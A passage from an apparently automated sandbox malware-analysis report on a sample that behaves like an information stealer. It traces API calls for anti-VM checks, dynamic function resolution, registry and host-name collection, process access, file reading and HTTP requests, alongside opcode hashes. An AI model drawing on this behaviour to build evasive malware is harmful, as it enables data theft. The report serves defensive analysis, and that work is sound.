                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                      • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                      • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                      • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction ID: 522a35653b5716a3cd8e766be079c84312c0219428d27bb9b95bacca52e49e9d
                                      • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                      • Instruction Fuzzy Hash: A9213BB5D00219ABDF24DFA4E849AED7B75FF44321F108225E925A72D0EB706A05CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0087D958,00000000,00020119,00000000), ref: 004176DD
                                      • RegQueryValueExA.ADVAPI32(00000000,00880E48,00000000,00000000,?,000000FF), ref: 004176FE
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3466090806-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231790B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317912
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02317944
                                      • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02317965
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0231796F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction ID: 7f5eeb07a015b0b4550117545beeb311d78d5de014a7f54a4b64366e0bacbc29
                                      • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                      • Instruction Fuzzy Hash: 7B012CB9A80204BBEB14DBE0DD49FADB7BDEB48701F005154BA0596285D7749944CF51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0087D958,00000000,00020119,004176B9), ref: 0041775B
                                      • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                      • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3466090806-1022791448
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                      APIs
                                      • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                      • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                      • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID: :A$:A
                                      • API String ID: 1378416451-1974578005
                                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                      • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023075A1
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02307618
                                      • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02307674
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 023076B9
                                      • HeapFree.KERNEL32(00000000), ref: 023076C0
                                        • Part of subcall function 023094A7: vsprintf_s.MSVCRT ref: 023094C2
                                      • task.LIBCPMTD ref: 023077BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                      • String ID:
                                      • API String ID: 700816787-0
                                      • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction ID: 658c5d83856b4b595ea466a7a20293e3831e529dbab1ab3d86305ba098b4f465
                                      • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                      • Instruction Fuzzy Hash: 51611EB591026C9BDB24DB50CC94FEDB7B9BF48704F0081E9E649A6180DB70ABC5CFA4
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 023064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02306548
                                        • Part of subcall function 023064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0230656A
                                        • Part of subcall function 023064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0230659C
                                        • Part of subcall function 023064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023065EC
                                        • Part of subcall function 023064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02306626
                                        • Part of subcall function 023064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02306638
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0231557F
                                      • lstrlen.KERNEL32(00000000), ref: 02315596
                                        • Part of subcall function 02319097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023190B9
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 023155CB
                                      • lstrlen.KERNEL32(00000000), ref: 023155EA
                                      • strtok.MSVCRT(00000000,?), ref: 02315605
                                      • lstrlen.KERNEL32(00000000), ref: 02315615
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID:
                                      • API String ID: 3532888709-0
                                      • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction ID: a38e65bbca72456bba359c78329df8dbab4432832b31118be7c1ef94a7ca71a2
                                      • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                      • Instruction Fuzzy Hash: E651E870911248EBCB2CFFA0CEA5AED7B76AF50302F904018E80A665D0EF346B45CF51
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02317345
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,02317574,004205BD), ref: 02317383
                                      • memset.MSVCRT ref: 023173D1
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02317525
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID:
                                      • API String ID: 224852652-0
                                      • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction ID: 703c15dcf94eef879299660fc6170b970caa9c33fc73ae6b0bc6480b0a48685e
                                      • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                      • Instruction Fuzzy Hash: F95170B0D002189FDB28DBA0DC95BEDF775AF44305F5445A9E109A7181EF746A88CF68
                                      APIs
                                      • memset.MSVCRT ref: 004140D5
                                      • RegOpenKeyExA.ADVAPI32(80000001,00881240,00000000,00020119,?), ref: 004140F4
                                      • RegQueryValueExA.ADVAPI32(?,00881D50,00000000,00000000,00000000,000000FF), ref: 00414118
                                      • RegCloseKey.ADVAPI32(?), ref: 00414122
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                      • lstrcatA.KERNEL32(?,00881E10), ref: 0041415B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                      • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                      • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                      APIs
                                      • memset.MSVCRT ref: 0231433C
                                      • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0231435B
                                      • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0231437F
                                      • RegCloseKey.ADVAPI32(?), ref: 02314389
                                      • lstrcat.KERNEL32(?,00000000), ref: 023143AE
                                      • lstrcat.KERNEL32(?,0064A168), ref: 023143C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction ID: 9bb5e8aa69a0e0ecd7f0b5b3a5084b41f0134d46feec39f0cd0c7dd3cdc0f98b
                                      • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                      • Instruction Fuzzy Hash: 104187B69401087BDB28EBE0DC95FEE737EAB49700F00455CA729571C0EA7557888FE1
                                      APIs
                                      • strtok_s.MSVCRT ref: 00413588
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • strtok_s.MSVCRT ref: 004136D1
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpystrtok_s$lstrlen
                                      • String ID:
                                      • API String ID: 3184129880-0
                                      • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                      • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                      • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                      • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                      APIs
                                      • __lock.LIBCMT ref: 0041B39A
                                        • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                        • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                        • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                                      • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                                        • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                      • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2005412495-0
                                      • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                      • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                                      • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                                      • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                      APIs
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02319B08
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02319B21
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02319B39
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02319B51
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02319B6A
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02319B82
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02319B9A
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02319BB3
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02319BCB
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02319BE3
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02319BFC
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02319C14
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02319C2C
                                        • Part of subcall function 02319AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02319C45
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02301437: ExitProcess.KERNEL32 ref: 02301478
                                        • Part of subcall function 023013C7: GetSystemInfo.KERNEL32(?), ref: 023013D1
                                        • Part of subcall function 023013C7: ExitProcess.KERNEL32 ref: 023013E5
                                        • Part of subcall function 02301377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02301392
                                        • Part of subcall function 02301377: VirtualAllocExNuma.KERNEL32(00000000), ref: 02301399
                                        • Part of subcall function 02301377: ExitProcess.KERNEL32 ref: 023013AA
                                        • Part of subcall function 02301487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023014A5
                                        • Part of subcall function 02301487: __aulldiv.LIBCMT ref: 023014BF
                                        • Part of subcall function 02301487: __aulldiv.LIBCMT ref: 023014CD
                                        • Part of subcall function 02301487: ExitProcess.KERNEL32 ref: 023014FB
                                        • Part of subcall function 023169D7: GetUserDefaultLangID.KERNEL32 ref: 023169DB
                                        • Part of subcall function 023013F7: ExitProcess.KERNEL32 ref: 0230142D
                                        • Part of subcall function 02317AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0230141E), ref: 02317AE7
                                        • Part of subcall function 02317AB7: RtlAllocateHeap.NTDLL(00000000), ref: 02317AEE
                                        • Part of subcall function 02317AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02317B06
                                        • Part of subcall function 02317B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02317B77
                                        • Part of subcall function 02317B47: RtlAllocateHeap.NTDLL(00000000), ref: 02317B7E
                                        • Part of subcall function 02317B47: GetComputerNameA.KERNEL32(?,00000104), ref: 02317B96
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02316D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 02316D60
                                      • Sleep.KERNEL32(00001770), ref: 02316D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D81
                                      • ExitProcess.KERNEL32 ref: 02316D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction ID: 3ab6de5d86f77a387fdc52c05506e08cc618eb698421bd49f254d1d447984193
                                      • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                      • Instruction Fuzzy Hash: 72312575A41208ABDB2CFBF0DC65BFEB77AAF14302F505519E102A61D0EF749A44CE62
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                      • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                      • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                      • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                      • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                      • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                                      • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                      • ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
